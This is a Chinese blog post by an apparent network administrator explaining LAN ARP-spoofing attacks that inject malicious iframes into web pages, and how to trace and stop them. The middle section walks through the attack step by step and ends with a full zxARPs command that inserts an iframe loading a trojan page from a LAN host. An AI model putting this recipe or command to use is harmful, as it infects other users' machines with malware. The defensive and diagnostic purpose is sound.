局域网arp欺骗挂马的方法与解决方法
正在taobao上逛来逛去,忽然感觉网速好慢,然后biu的一下,NOD32跳出来说有木马,浏览器上方横出一个黄色的条条让安装写什么,嗯哼?中毒?周围的电脑也都开始报毒,马上反应过来是arp欺骗,马上登上ISA主机查看,果然发现有台机不正常,跑过去禁掉网卡,杀毒后再启用网卡,搞定。之前也出现过这种情况,也是在局域网未受到大影响就解决了,那这是怎么一个原理呢?
可以看到在报毒的时候,所有的网页源码里开头都有个iframe,整个流程是这样:问题机器中木马,开始arp欺骗,其他机器收到arp广播,认为问题机器是网关,于是走这条路,问题机器将http请求开头加上那个iframe,目的是为了再传播。
之前有在麦粉丝上看到一个关于arp域名劫持的视频演示,地址http://www.mcafeefans.com/article.asp?id=1622,整个挂马的过程大概就是这样的:
1、配置木马客户端,这个不用多说了,黑洞、灰鸽子……大把的是
2、生成网页木马,软件也大把的是,一般都是利用windows的漏洞的,名称也都是什么“MS07-033”“MS07-004”“MS07-045”等等,生成的网页木马的地址当然就是你准备上传木马的地址了,现在要在局域网弄,比如ip为192.168.1.51。
3、在192.168.1.51上开一个http服务,软件也多得很,使得你生成网马时填的地址能访问到马。
4、挂马,这个工具叫zxARPs,是一个通过ARP欺骗实现局域网挂马的工具。在使用zxARPs前我们要安装WinPcap,winpcap这个东西大家都很熟悉了,这是个网络底层驱动包,什么网络执法官、超级网管、聚生网管等都用到了这个,实际上这些软件也都是基于arp的原理来实现控制的。
安装好后将zxARPs放到任意目录,然后运行“命令提示符”,进入zxARPs所在的目录,然后输入命令:zxARPs.exe -idx 0 -ip 192.168.1.1-192.168.1.255 -port 80 -insert "<iframe src=’http://192.168.1.51/ma.htm’ width=0 height=0>"。回车后挂马就成功了。从现在开始,局域网中的用户无论访问什么网站,都会运行我们的网页木马,因为zxARPs在用户打开网页的同时已经将挂马代码插入到正常网页中了。
可见zxARPs的功能真的十分强大,但它毕竟是基于ARP欺骗原理的,只要局域网内的主机能够抵御ARP欺骗攻击,就可以完全无视zxARPs的挂马方法,比如安装360安全卫士的arp防火墙等。
那中了这种毒后怎样迅速查出源头呢?当然,手头要有ip对应的mac地址表,这样才能让你更快的查出对应的电脑,另外推荐“科来网络分析系统”,一般查看数据链路层有无异常数据包,基本上就能找到了,不过注意,其他使用winpcap的软件会干扰到“科来”。
如果你之前有使用过聚生网管之类的软件,这样就更好查了,打开聚生,启动监控,查看主机列表里面,你会发现挂马的那台机的计算机名在不停变换,变来变去你不知道它到底是哪个了,简单,你看看那台上面的ip地址与下面的ip地址,那就可以确定了这台的ip了,ip表总该有吧,这都没有的话做网管就太失败了,找到这台机拔掉网线杀毒就可以了。
